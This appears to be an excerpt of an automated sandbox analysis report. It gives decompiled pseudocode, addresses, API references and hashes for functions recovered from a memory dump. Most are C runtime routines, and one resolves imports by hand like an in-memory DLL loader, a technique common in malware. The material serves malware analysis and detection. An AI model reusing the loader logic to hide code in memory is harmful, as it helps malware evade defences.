									_t64 = E1000951C();
									__eflags = _t97 - _t64 + 0x20;
									if(_t97 == _t64 + 0x20) {
										L13:
										_t66 = E1000961C(_t94);
										__eflags = _t66;
										if(_t66 == 0) {
											goto L14;
										}
									} else {
										_t68 = E1000951C();
										__eflags = _t97 - _t68 + 0x40;
										if(_t97 != _t68 + 0x40) {
											L14:
											E1000A133(_t97);
										} else {
											goto L13;
										}
									}
								}
								__eflags = _t97[3] & 0x00000108;
								if(__eflags == 0) {
									_v12 = _a4;
									_push(2);
									_push( &_v12);
									_push(_t94);
									_v8 = 2;
									_t53 = E10009680(_t75, _t91, _t94, _t97, __eflags);
									_t80 = _a4;
									_t75 = _t53;
									goto L27;
								} else {
									_t92 = _t97[2];
									 *_t97 = _t92 + 2;
									_t82 =  *_t97 - _t92;
									_v8 = _t82;
									_t97[1] = _t97[6] - 2;
									__eflags = _t82;
									if(__eflags <= 0) {
										__eflags = _t94 - 0xffffffff;
										if(_t94 == 0xffffffff) {
											L22:
											_t83 = 0x10012340;
										} else {
											__eflags = _t94 - 0xfffffffe;
											if(_t94 == 0xfffffffe) {
												goto L22;
											} else {
												_t83 = ((_t94 & 0x0000001f) << 6) +  *((intOrPtr*)(0x10014c80 + (_t94 >> 5) * 4));
											}
										}
										__eflags =  *(_t83 + 4) & 0x00000020;
										if(__eflags == 0) {
											goto L25;
										} else {
											_push(2);
											_push(_t75);
											_push(_t75);
											_push(_t94);
											_t59 = E10009FB9(_t75, _t94, _t97, __eflags);
											__eflags = (_t59 & _t92) - 0xffffffff;
											if((_t59 & _t92) == 0xffffffff) {
												goto L28;
											} else {
												goto L25;
											}
										}
									} else {
										_push(_t82);
										_push(_t92);
										_push(_t94);
										_t75 = E10009680(_t75, _t92, _t94, _t97, __eflags);
										L25:
										_t80 = _a4;
										 *(_t97[2]) = _t80;
										L27:
										__eflags = _t75 - _v8;
										if(_t75 == _v8) {
											_t54 = _t80 & 0x0000ffff;
										} else {
											L28:
											_t43 =  &(_t97[3]);
											 *_t43 = _t97[3] | 0x00000020;
											__eflags =  *_t43;
											goto L29;
										}
									}
								}
							} else {
								_t97[1] = 0;
								__eflags = _t79 & 0x00000010;
								if((_t79 & 0x00000010) == 0) {
									_t97[3] = _t79 | 0x00000020;
									L29:
									_t54 = 0xffff;
								} else {
									_t90 = _t79 & 0xfffffffe;
									__eflags = _t90;
									 *_t97 = _t97[2];
									_t97[3] = _t90;
									goto L10;
								}
							}
						} else {
							 *((intOrPtr*)(E10005EC6())) = 0x22;
							goto L6;
						}
					} else {
						 *((intOrPtr*)(E10005EC6())) = 9;
						L6:
						_t97[3] = _t97[3] | 0x00000020;
						_t54 = 0xffff;
					}
					return _t54;
				} else {
					return _t46 | 0xffffffff;
				}
			}

0x1000c46d
0x1000c474
0x1000c47c
0x1000c481
0x1000c487
0x1000c48a
0x1000c48c
0x1000c48f
0x1000c49e
0x1000c4a1
0x1000c4bd
0x1000c4bf
0x1000c4c2
0x1000c4d7
0x1000c4dd
0x1000c4e0
0x1000c4e3
0x1000c4e6
0x1000c4eb
0x1000c4ed
0x1000c4f5
0x1000c4f7
0x1000c505
0x1000c506
0x1000c50c
0x1000c50e
0x00000000
0x00000000
0x1000c4f9
0x1000c4f9
0x1000c501
0x1000c503
0x1000c510
0x1000c511
0x00000000
0x00000000
0x00000000
0x1000c503
0x1000c4f7
0x1000c517
0x1000c51e
0x1000c5a0
0x1000c5a4
0x1000c5a9
0x1000c5aa
0x1000c5ab
0x1000c5b2
0x1000c5b7
0x1000c5bd
0x00000000
0x1000c520
0x1000c520
0x1000c528
0x1000c52d
0x1000c532
0x1000c535
0x1000c538
0x1000c53a
0x1000c553
0x1000c556
0x1000c573
0x1000c573
0x1000c558
0x1000c558
0x1000c55b
0x00000000
0x1000c55d
0x1000c56a
0x1000c56a
0x1000c55b
0x1000c578
0x1000c57c
0x00000000
0x1000c57e
0x1000c57e
0x1000c580
0x1000c581
0x1000c582
0x1000c583
0x1000c58d
0x1000c590
0x00000000
0x00000000
0x00000000
0x00000000
0x1000c590
0x1000c53c
0x1000c53c
0x1000c53d
0x1000c53e
0x1000c547
0x1000c592
0x1000c595
0x1000c598
0x1000c5bf
0x1000c5bf
0x1000c5c2
0x1000c5cf
0x1000c5c4
0x1000c5c4
0x1000c5c4
0x1000c5c4
0x1000c5c4
0x00000000
0x1000c5c4
0x1000c5c2
0x1000c53a
0x1000c4c4
0x1000c4c4
0x1000c4c7
0x1000c4ca
0x1000c54e
0x1000c5c8
0x1000c5c8
0x1000c4cc
0x1000c4cf
0x1000c4cf
0x1000c4d2
0x1000c4d4
0x00000000
0x1000c4d4
0x1000c4ca
0x1000c4a3
0x1000c4a8
0x00000000
0x1000c4a8
0x1000c491
0x1000c496
0x1000c4ae
0x1000c4ae
0x1000c4b2
0x1000c4b2
0x1000c5d6
0x1000c476
0x1000c47a
0x1000c47a

APIs

__ioinit.LIBCMT ref: 1000C46D

Part of subcall function 100076DE: InitOnceExecuteOnce.KERNEL32(10013300,10007719,00000000,00000000), ref: 100076EC

Memory Dump Source

Source File: 00000007.00000002.2104680922.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2104676360.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2104690779.000000001000D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2104697302.0000000010012000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2104705101.0000000010015000.00000002.00020000.sdmp Download File

Similarity

API ID: Once$ExecuteInit__ioinit
String ID:
API String ID: 129814473-0
Opcode ID: ce445c66c181a3168f9633bae39411e21304db9b0211bfbf8d544381d7ae233e
Instruction ID: 4d06972f43a844bfa3949195b83d417bb95582cf177f034ad1b947d460bfdcb6
Opcode Fuzzy Hash: ce445c66c181a3168f9633bae39411e21304db9b0211bfbf8d544381d7ae233e
Instruction Fuzzy Hash: B641E175500B099BF724CB68CC91E6A77E4EF453E1F10861DE8A6876D9E774FD808B10

Uniqueness

Uniqueness Score: -1.00%

Function 10005033, Relevance: 9.1, APIs: 6, Instructions: 134
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E10005033(void* __eflags, signed char _a4, intOrPtr* _a8) {
				signed int _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t43;
				signed int _t44;
				signed int _t45;
				signed int _t48;
				signed int _t52;
				void* _t60;
				signed int _t62;
				void* _t64;
				signed int _t67;
				signed int _t70;
				signed int _t74;
				signed int _t76;
				void* _t77;
				signed int _t85;
				void* _t86;
				signed int _t87;
				signed int _t89;
				intOrPtr* _t92;

				_t44 = E100076DE(_t43);
				if(_t44 >= 0) {
					_t92 = _a8;
					_t45 = E100095F8(_t92);
					_t2 = _t92 + 0xc; // 0x66ce7cf0
					_t74 =  *_t2;
					_t89 = _t45;
					__eflags = _t74 & 0x00000082;
					if((_t74 & 0x00000082) != 0) {
						__eflags = _t74 & 0x00000040;
						if((_t74 & 0x00000040) == 0) {
							_t70 = 0;
							__eflags = _t74 & 0x00000001;
							if((_t74 & 0x00000001) == 0) {
								L10:
								_t16 = _t92 + 0xc; // 0x66ce7cf0
								_t48 =  *_t16 & 0xffffffef | 0x00000002;
								 *(_t92 + 0xc) = _t48;
								 *(_t92 + 4) = _t70;
								__eflags = _t48 & 0x0000010c;
								if((_t48 & 0x0000010c) == 0) {
									_t60 = E1000951C();
									__eflags = _t92 - _t60 + 0x20;
									if(_t92 == _t60 + 0x20) {
										L13:
										_t62 = E1000961C(_t89);
										__eflags = _t62;
										if(_t62 == 0) {
											goto L14;
										}
									} else {
										_t64 = E1000951C();
										__eflags = _t92 - _t64 + 0x40;
										if(_t92 != _t64 + 0x40) {
											L14:
											E1000A133(_t92);
										} else {
											goto L13;
										}
									}
								}
								__eflags =  *(_t92 + 0xc) & 0x00000108;
								if(( *(_t92 + 0xc) & 0x00000108) == 0) {
									__eflags = 1;
									_push(1);
									_v8 = 1;
									_push( &_a4);
									_push(_t89);
									_t45 = E10009680(_t70, _t86, _t89, _t92, 1);
									_t70 = _t45;
									goto L27;
								} else {
									_t24 = _t92 + 8; // 0x753b46c6
									_t87 =  *_t24;
									_t25 = _t87 + 1; // 0x753b46c7
									 *_t92 = _t25;
									_t26 = _t92 + 0x18; // 0x8b0d78fe
									_t76 =  *_t92 - _t87;
									_v8 = _t76;
									 *(_t92 + 4) =  *_t26 - 1;
									__eflags = _t76;
									if(__eflags <= 0) {
										__eflags = _t89 - 0xffffffff;
										if(_t89 == 0xffffffff) {
											L22:
											_t77 = 0x10012340;
										} else {
											__eflags = _t89 - 0xfffffffe;
											if(_t89 == 0xfffffffe) {
												goto L22;
											} else {
												_t77 = ((_t89 & 0x0000001f) << 6) +  *((intOrPtr*)(0x10014c80 + (_t89 >> 5) * 4));
											}
										}
										__eflags =  *(_t77 + 4) & 0x00000020;
										if(__eflags == 0) {
											goto L25;
										} else {
											_push(2);
											_push(_t70);
											_push(_t70);
											_push(_t89);
											_t45 = E10009FB9(_t70, _t89, _t92, __eflags) & _t87;
											__eflags = _t45 - 0xffffffff;
											if(_t45 == 0xffffffff) {
												goto L28;
											} else {
												goto L25;
											}
										}
									} else {
										_push(_t76);
										_push(_t87);
										_push(_t89);
										_t70 = E10009680(_t70, _t87, _t89, _t92, __eflags);
										L25:
										_t35 = _t92 + 8; // 0x753b46c6
										_t45 = _a4;
										 *( *_t35) = _t45;
										L27:
										__eflags = _t70 - _v8;
										if(_t70 == _v8) {
											_t52 = _a4 & 0x000000ff;
										} else {
											L28:
											_t40 = _t92 + 0xc;
											 *_t40 =  *(_t92 + 0xc) | 0x00000020;
											__eflags =  *_t40;
											goto L29;
										}
									}
								}
							} else {
								 *(_t92 + 4) = 0;
								__eflags = _t74 & 0x00000010;
								if((_t74 & 0x00000010) == 0) {
									 *(_t92 + 0xc) = _t74 | 0x00000020;
									L29:
									_t52 = _t45 | 0xffffffff;
								} else {
									_t14 = _t92 + 8; // 0x753b46c6
									_t85 = _t74 & 0xfffffffe;
									__eflags = _t85;
									 *_t92 =  *_t14;
									 *(_t92 + 0xc) = _t85;
									goto L10;
								}
							}
						} else {
							_t67 = E10005EC6();
							 *_t67 = 0x22;
							goto L6;
						}
					} else {
						_t67 = E10005EC6();
						 *_t67 = 9;
						L6:
						 *(_t92 + 0xc) =  *(_t92 + 0xc) | 0x00000020;
						_t52 = _t67 | 0xffffffff;
					}
					return _t52;
				} else {
					return _t44 | 0xffffffff;
				}
			}

0x10005037
0x1000503e
0x10005046
0x1000504b
0x10005051
0x10005051
0x10005054
0x10005056
0x10005059
0x10005068
0x1000506b
0x10005085
0x10005087
0x1000508a
0x1000509f
0x1000509f
0x100050a5
0x100050a8
0x100050ab
0x100050ae
0x100050b3
0x100050b5
0x100050bd
0x100050bf
0x100050cd
0x100050ce
0x100050d4
0x100050d6
0x00000000
0x00000000
0x100050c1
0x100050c1
0x100050c9
0x100050cb
0x100050d8
0x100050d9
0x00000000
0x00000000
0x00000000
0x100050cb
0x100050bf
0x100050df
0x100050e6
0x10005164
0x10005165
0x10005166
0x1000516c
0x1000516d
0x1000516e
0x10005176
0x00000000
0x100050e8
0x100050e8
0x100050e8
0x100050ed
0x100050f0
0x100050f2
0x100050f5
0x100050f8
0x100050fb
0x100050fe
0x10005100
0x10005119
0x1000511c
0x10005139
0x10005139
0x1000511e
0x1000511e
0x10005121
0x00000000
0x10005123
0x10005130
0x10005130
0x10005121
0x1000513e
0x10005142
0x00000000
0x10005144
0x10005144
0x10005146
0x10005147
0x10005148
0x1000514e
0x10005153
0x10005156
0x00000000
0x00000000
0x00000000
0x00000000
0x10005156
0x10005102
0x10005102
0x10005103
0x10005104
0x1000510d
0x10005158
0x10005158
0x1000515b
0x1000515e
0x10005178
0x10005178
0x1000517b
0x10005186
0x1000517d
0x1000517d
0x1000517d
0x1000517d
0x1000517d
0x00000000
0x1000517d
0x1000517b
0x10005100
0x1000508c
0x1000508c
0x1000508f
0x10005092
0x10005114
0x10005181
0x10005181
0x10005094
0x10005094
0x10005097
0x10005097
0x1000509a
0x1000509c
0x00000000
0x1000509c
0x10005092
0x1000506d
0x1000506d
0x10005072
0x00000000
0x10005072
0x1000505b
0x1000505b
0x10005060
0x10005078
0x10005078
0x1000507c
0x1000507c
0x1000518e
0x10005040
0x10005044
0x10005044

APIs

__ioinit.LIBCMT ref: 10005037

Part of subcall function 100076DE: InitOnceExecuteOnce.KERNEL32(10013300,10007719,00000000,00000000), ref: 100076EC

Memory Dump Source

Source File: 00000007.00000002.2104680922.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2104676360.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2104690779.000000001000D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2104697302.0000000010012000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2104705101.0000000010015000.00000002.00020000.sdmp Download File

Similarity

API ID: Once$ExecuteInit__ioinit
String ID:
API String ID: 129814473-0
Opcode ID: 094f6d4174cdee5f7286b7252394e54f5dc20bac084be214e94df9e6538c1141
Instruction ID: 32086827ce60b9a2cbb99d25a0e80922b058c4e771a23cab2cd98d30bef894a1
Opcode Fuzzy Hash: 094f6d4174cdee5f7286b7252394e54f5dc20bac084be214e94df9e6538c1141
Instruction Fuzzy Hash: 4A41F171900B059FF324CF68C851BAB77E4DF453E2B10871DE8B6C62D9E676E9408B50

Uniqueness

Uniqueness Score: -1.00%

Function 10004A66, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E10004A66(void* __ebx, void* __edx, void* __edi, void* __eflags, intOrPtr _a4) {
				char* _v16;
				char _v28;
				signed char _v32;
				void* _t10;
				void* _t19;
				intOrPtr* _t22;
				void* _t24;
				void* _t25;
				intOrPtr* _t27;

				_t25 = __edi;
				_t24 = __edx;
				_t19 = __ebx;
				while(1) {
					_t10 = E10008E67(_t19, _t24, _t25, _a4);
					if(_t10 != 0) {
						break;
					}
					if(E10009026(_t10, _a4) == 0) {
						_push(1);
						_t22 =  &_v28;
						_v16 = "bad allocation";
						E10008F1E(_t22,  &_v16);
						_v28 = 0x1000e460;
						E10009059( &_v28, 0x10010b04);
						asm("int3");
						_t27 = _t22;
						 *_t27 = 0x1000e460;
						E10008F5C(_t22);
						if((_v32 & 0x00000001) != 0) {
							L10003800(_t27);
						}
						return _t27;
					} else {
						continue;
					}
					L7:
				}
				return _t10;
				goto L7;
			}

0x10004a66
0x10004a66
0x10004a66
0x10004a7b
0x10004a7e
0x10004a86
0x00000000
0x00000000
0x10004a79
0x10004a8a
0x10004a90
0x10004a93
0x10004a9a
0x10004aa8
0x10004aaf
0x10004ab4
0x10004ab9
0x10004abb
0x10004ac1
0x10004aca
0x10004acd
0x10004ad2
0x10004ad7
0x00000000
0x00000000
0x00000000
0x00000000
0x10004a79
0x10004a89
0x00000000

APIs

_malloc.LIBCMT ref: 10004A7E

Part of subcall function 10008E67: __FF_MSGBANNER.LIBCMT ref: 10008E7E
Part of subcall function 10008E67: __NMSG_WRITE.LIBCMT ref: 10008E85
Part of subcall function 10008E67: HeapAlloc.KERNEL32(00500000,00000000,00000001,00000000,?,00000000,?,10007F7D,1000E4A0,1000E4A0,1000E4A0,?,?,10009274,00000018,10010E08), ref: 10008EAA

std::exception::exception.LIBCMT ref: 10004A9A
__CxxThrowException@8.LIBCMT ref: 10004AAF

Part of subcall function 10009059: RaiseException.KERNEL32(?,?,?,10010B04,?,?,?,10004AB4,?,10010B04,00000000,00000001), ref: 100090AA

Strings

`, xrefs: 10004AA8
h, xrefs: 10004A93

Memory Dump Source

Source File: 00000007.00000002.2104680922.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2104676360.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2104690779.000000001000D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2104697302.0000000010012000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2104705101.0000000010015000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocExceptionException@8HeapRaiseThrow_mallocstd::exception::exception
String ID: `$h
API String ID: 1059622496-773005782
Opcode ID: 8198483a73eec0a2752513ca626908b84cd43bbea8819fe80895fe02013f144e
Instruction ID: ad3e8221741d280e2df0066782729e531edcb1fd3c4a4238d597797a5e5b62a6
Opcode Fuzzy Hash: 8198483a73eec0a2752513ca626908b84cd43bbea8819fe80895fe02013f144e
Instruction Fuzzy Hash: C2F028B550024D6AFB00DBA8DC01ADF77ACEF023C4F114426F900A2149CFB1AA4087AA

Uniqueness

Uniqueness Score: -1.00%

Function 1000B39B, Relevance: 7.6, APIs: 5, Instructions: 67
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E1000B39B(void* __ebx, void* __edx, void* __edi, void* _a4, long _a8) {
				void* _t7;
				void* _t8;
				intOrPtr* _t9;
				intOrPtr* _t12;
				void* _t20;
				long _t31;

				if(_a4 != 0) {
					_t31 = _a8;
					if(_t31 != 0) {
						_push(__ebx);
						while(_t31 <= 0xffffffe0) {
							if(_t31 == 0) {
								_t31 = _t31 + 1;
							}
							_t7 = HeapReAlloc( *0x100132fc, 0, _a4, _t31);
							_t20 = _t7;
							if(_t20 != 0) {
								L17:
								_t8 = _t20;
							} else {
								if( *0x10013c2c == _t7) {
									_t9 = E10005EC6();
									 *_t9 = E10005ED9(GetLastError());
									goto L17;
								} else {
									if(E10009026(_t7, _t31) == 0) {
										_t12 = E10005EC6();
										 *_t12 = E10005ED9(GetLastError());
										L12:
										_t8 = 0;
									} else {
										continue;
									}
								}
							}
							goto L14;
						}
						E10009026(_t6, _t31);
						 *((intOrPtr*)(E10005EC6())) = 0xc;
						goto L12;
					} else {
						E10004732(_a4);
						_t8 = 0;
					}
					L14:
					return _t8;
				} else {
					return E10008E67(__ebx, __edx, __edi, _a8);
				}
			}

0x1000b3a2
0x1000b3b0
0x1000b3b5
0x1000b3c4
0x1000b3f7
0x1000b3c9
0x1000b3cb
0x1000b3cb
0x1000b3d8
0x1000b3de
0x1000b3e2
0x1000b442
0x1000b442
0x1000b3e4
0x1000b3ea
0x1000b42c
0x1000b440
0x00000000
0x1000b3ec
0x1000b3f5
0x1000b414
0x1000b428
0x1000b40e
0x1000b40e
0x00000000
0x00000000
0x00000000
0x1000b3f5
0x1000b3ea
0x00000000
0x1000b410
0x1000b3fd
0x1000b408
0x00000000
0x1000b3b7
0x1000b3ba
0x1000b3c0
0x1000b3c0
0x1000b411
0x1000b413
0x1000b3a4
0x1000b3ae
0x1000b3ae

APIs

_malloc.LIBCMT ref: 1000B3A7

Part of subcall function 10008E67: __FF_MSGBANNER.LIBCMT ref: 10008E7E
Part of subcall function 10008E67: __NMSG_WRITE.LIBCMT ref: 10008E85
Part of subcall function 10008E67: HeapAlloc.KERNEL32(00500000,00000000,00000001,00000000,?,00000000,?,10007F7D,1000E4A0,1000E4A0,1000E4A0,?,?,10009274,00000018,10010E08), ref: 10008EAA

_free.LIBCMT ref: 1000B3BA

Memory Dump Source

Source File: 00000007.00000002.2104680922.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2104676360.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2104690779.000000001000D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2104697302.0000000010012000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2104705101.0000000010015000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocHeap_free_malloc
String ID:
API String ID: 2734353464-0
Opcode ID: 1470ddf5c31cb35418e52f366651dade25ef90282a91678f077e8ad7c8708cdc
Instruction ID: 18c43e679c10c76ba13cd9b028f176d48a0d2f42c637b465b0a36ca5614664b7
Opcode Fuzzy Hash: 1470ddf5c31cb35418e52f366651dade25ef90282a91678f077e8ad7c8708cdc
Instruction Fuzzy Hash: AD11E031404616AFFB24EF74DC4564F3BD4DF042E1F218425F9489A15ADB31DE409750

Uniqueness

Uniqueness Score: -1.00%

Function 1000883C, Relevance: 7.5, APIs: 5, Instructions: 47
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E1000883C(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				LONG* _t20;
				signed int _t25;
				void* _t29;
				void* _t31;
				LONG* _t33;
				void* _t34;

				_t29 = __edx;
				_t24 = __ebx;
				_push(0xc);
				_push(0x10010da8);
				E10008040(__ebx, __edi, __esi);
				_t31 = E10006087();
				_t25 =  *0x10012ae4; // 0xfffffffe
				if(( *(_t31 + 0x70) & _t25) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
					E100091AB(0xd);
					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
					_t33 =  *(_t31 + 0x68);
					 *(_t34 - 0x1c) = _t33;
					__eflags = _t33 -  *0x10012394; // 0x10012690
					if(__eflags != 0) {
						__eflags = _t33;
						if(__eflags != 0) {
							__eflags = InterlockedDecrement(_t33);
							if(__eflags == 0) {
								__eflags = _t33 - 0x10012690;
								if(__eflags != 0) {
									E10004732(_t33);
								}
							}
						}
						_t20 =  *0x10012394; // 0x10012690
						 *(_t31 + 0x68) = _t20;
						_t33 =  *0x10012394; // 0x10012690
						 *(_t34 - 0x1c) = _t33;
						InterlockedIncrement(_t33);
					}
					 *(_t34 - 4) = 0xfffffffe;
					E100088D8();
				} else {
					_t33 =  *(_t31 + 0x68);
				}
				_t38 = _t33;
				if(_t33 == 0) {
					E1000743E(_t24, _t29, _t31, _t33, _t38, 0x20);
				}
				return E10008085(_t33);
			}

0x1000883c
0x1000883c
0x1000883c
0x1000883e
0x10008843
0x1000884d
0x1000884f
0x10008858
0x10008879
0x1000887f
0x10008883
0x10008886
0x10008889
0x1000888f
0x10008891
0x10008893
0x1000889c
0x1000889e
0x100088a0
0x100088a6
0x100088a9
0x100088ae
0x100088a6
0x1000889e
0x100088af
0x100088b4
0x100088b7
0x100088bd
0x100088c1
0x100088c1
0x100088c7
0x100088ce
0x10008860
0x10008860
0x10008860
0x10008863
0x10008865
0x10008869
0x1000886e
0x10008876

APIs

Part of subcall function 10006087: __getptd_noexit.LIBCMT ref: 10006088
Part of subcall function 10006087: __amsg_exit.LIBCMT ref: 10006095

__amsg_exit.LIBCMT ref: 10008869
__lock.LIBCMT ref: 10008879
InterlockedDecrement.KERNEL32(?), ref: 10008896
_free.LIBCMT ref: 100088A9
InterlockedIncrement.KERNEL32(10012690), ref: 100088C1

Memory Dump Source

Source File: 00000007.00000002.2104680922.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2104676360.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2104690779.000000001000D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2104697302.0000000010012000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2104705101.0000000010015000.00000002.00020000.sdmp Download File

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd_noexit__lock_free
String ID:
API String ID: 1231874560-0
Opcode ID: 30cc922b94fd66d93e4772b0e45363f14a3d134312cd16711b26b484a5aab7eb
Instruction ID: 6fa5c55f02b032b9b52f9637cbc65706c3d9556ef65a5339b15ab8c9acf7f00e
Opcode Fuzzy Hash: 30cc922b94fd66d93e4772b0e45363f14a3d134312cd16711b26b484a5aab7eb
Instruction Fuzzy Hash: 7901C075A016219BFB44EB64888578E77A0FF047D4F51800AE9886768CCF38AB91CFD2

Uniqueness

Uniqueness Score: -1.00%

Function 10001470, Relevance: 6.4, APIs: 5, Instructions: 143
COMMON

Download Yara Rule

C-Code - Quality: 48%

			E10001470(void* __ecx, intOrPtr* _a4) {
				intOrPtr _v8;
				void* _v12;
				intOrPtr _v16;
				intOrPtr _t44;
				signed short _t56;
				signed int _t58;
				intOrPtr _t60;
				intOrPtr _t64;
				intOrPtr _t65;
				void* _t67;
				intOrPtr* _t68;
				intOrPtr _t70;
				void _t71;
				signed short* _t72;
				intOrPtr _t73;
				intOrPtr _t77;
				intOrPtr* _t78;
				intOrPtr _t79;
				intOrPtr _t80;
				signed short* _t82;
				void* _t84;
				void* _t85;

				_t78 = _a4;
				_t65 =  *_t78;
				_t2 = _t78 + 4; // 0x4d8d5010
				_t79 =  *_t2;
				_a4 = _t79;
				if( *((intOrPtr*)(_t65 + 0x84)) == 0) {
					L22:
					return 1;
				} else {
					_t67 =  *((intOrPtr*)(_t65 + 0x80)) + _t79;
					_v12 = _t67;
					if(IsBadReadPtr(_t67, 0x14) == 0) {
						while(1) {
							_t44 =  *((intOrPtr*)(_t67 + 0xc));
							if(_t44 == 0) {
								goto L22;
							}
							_t8 = _t78 + 0x28; // 0x12f7805
							_t9 = _t78 + 0x1c; // 0xe58b0000
							_t80 =  *((intOrPtr*)( *_t9))(_t44 + _t79,  *_t8);
							_t85 = _t84 + 8;
							_v8 = _t80;
							if(_t80 == 0) {
								SetLastError(0x7e);
								return 0;
							} else {
								_t11 = _t78 + 0xc; // 0xd0ff0000
								_t14 = _t78 + 8; // 0x637e8ef
								_t70 = E10001DD0( *_t14, 4 +  *_t11 * 4);
								_t84 = _t85 + 8;
								if(_t70 == 0) {
									_t40 = _t78 + 0x28; // 0x12f7805
									_t41 = _t78 + 0x24; // 0x39c033cc
									 *((intOrPtr*)( *_t41))(_t80,  *_t40);
									SetLastError(0xe);
									return 0;
								} else {
									_t15 = _t78 + 0xc; // 0xd0ff0000
									 *((intOrPtr*)(_t78 + 8)) = _t70;
									_t77 = _t80;
									 *((intOrPtr*)(_t70 +  *_t15 * 4)) = _t77;
									 *(_t78 + 0xc) =  *(_t78 + 0xc) + 1;
									_t71 =  *_t67;
									if(_t71 == 0) {
										_t82 =  *((intOrPtr*)(_t67 + 0x10)) + _a4;
										_t72 = _t82;
									} else {
										_t64 = _a4;
										_t82 = _t71 + _t64;
										_t72 =  *((intOrPtr*)(_t67 + 0x10)) + _t64;
									}
									_t56 =  *_t82;
									if(_t56 == 0) {
										L17:
										_t67 = _t67 + 0x14;
										_v12 = _t67;
										if(IsBadReadPtr(_t67, 0x14) != 0) {
											goto L22;
										} else {
											_t79 = _a4;
											continue;
										}
									} else {
										_t73 = _t72 - _t82;
										_v16 = _t73;
										while(1) {
											_t27 = _t78 + 0x28; // 0x12f7805
											_push( *_t27);
											_t68 = _t73 + _t82;
											if(_t56 >= 0) {
												_t58 = _t56 + _a4 + 2;
											} else {
												_t58 = _t56 & 0x0000ffff;
											}
											_t30 = _t78 + 0x20; // 0xccccc35d
											_t60 =  *((intOrPtr*)( *_t30))(_t77, _t58);
											_t84 = _t84 + 0xc;
											 *_t68 = _t60;
											if(_t60 == 0) {
												break;
											}
											_t56 = _t82[2];
											_t73 = _v16;
											_t77 = _v8;
											_t82 =  &(_t82[2]);
											if(_t56 != 0) {
												continue;
											} else {
												_t67 = _v12;
												goto L17;
											}
											goto L23;
										}
										_t37 = _t78 + 0x28; // 0x12f7805
										_t39 = _t78 + 0x24; // 0x39c033cc
										 *((intOrPtr*)( *_t39))(_v8,  *_t37);
										SetLastError(0x7f);
										return 0;
									}
								}
							}
							goto L23;
						}
					}
					goto L22;
				}
				L23:
			}

0x10001479
0x1000147c
0x1000147e
0x1000147e
0x10001488
0x1000148b
0x100015db
0x100015e4
0x10001491
0x10001497
0x1000149c
0x100014a7
0x100014b0
0x100014b0
0x100014b5
0x00000000
0x00000000
0x100014bb
0x100014c1
0x100014c6
0x100014c8
0x100014cb
0x100014d0
0x100015c8
0x100015d6
0x100014d6
0x100014d6
0x100014e1
0x100014e9
0x100014eb
0x100014f0
0x100015a7
0x100015aa
0x100015ae
0x100015b5
0x100015c3
0x100014f6
0x100014f6
0x100014f9
0x100014fc
0x100014fe
0x10001501
0x10001504
0x10001508
0x1000151a
0x1000151d
0x1000150a
0x1000150a
0x1000150d
0x10001513
0x10001513
0x1000151f
0x10001523
0x1000156a
0x1000156a
0x10001570
0x1000157b
0x00000000
0x1000157d
0x1000157d
0x00000000
0x1000157d
0x10001525
0x10001525
0x10001527
0x10001530
0x10001530
0x10001530
0x10001533
0x10001538
0x10001545
0x1000153a
0x1000153a
0x1000153a
0x10001548
0x1000154c
0x1000154e
0x10001551
0x10001555
0x00000000
0x00000000
0x10001557
0x1000155a
0x1000155d
0x10001560
0x10001565
0x00000000
0x10001567
0x10001567
0x00000000
0x10001567
0x00000000
0x10001565
0x10001585
0x1000158b
0x1000158f
0x10001596
0x100015a4
0x100015a4
0x10001523
0x100014f0
0x00000000
0x100014d0
0x100014b0
0x00000000
0x100014a7
0x00000000

APIs

IsBadReadPtr.KERNEL32(?,00000014,00000000,00000000,00000000,100013CB), ref: 1000149F
SetLastError.KERNEL32(0000007E,?,?,?,?,?,?,?,?,10001B1F,00000000,100013CB,10001E80,10001E60,10001E50,00000000), ref: 100015C8

Part of subcall function 10001DD0: VirtualQuery.KERNEL32(0637E8EF,?,0000001C,100013CB,00000000,?,?,?,?,?,100014E9,0637E8EF,D0FF0000), ref: 10001DEA

IsBadReadPtr.KERNEL32(?,00000014,?,?,?,?,?,?,?,?,?,?,10001B1F,00000000,100013CB,10001E80), ref: 10001573
SetLastError.KERNEL32(0000007F), ref: 10001596
SetLastError.KERNEL32(0000000E,?,?,?,?,?,?,?,?,?,?,?,?,10001B1F,00000000,100013CB), ref: 100015B5

Memory Dump Source

Source File: 00000007.00000002.2104680922.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2104676360.0000000010000000.00000002.00020000.sdmp Download File
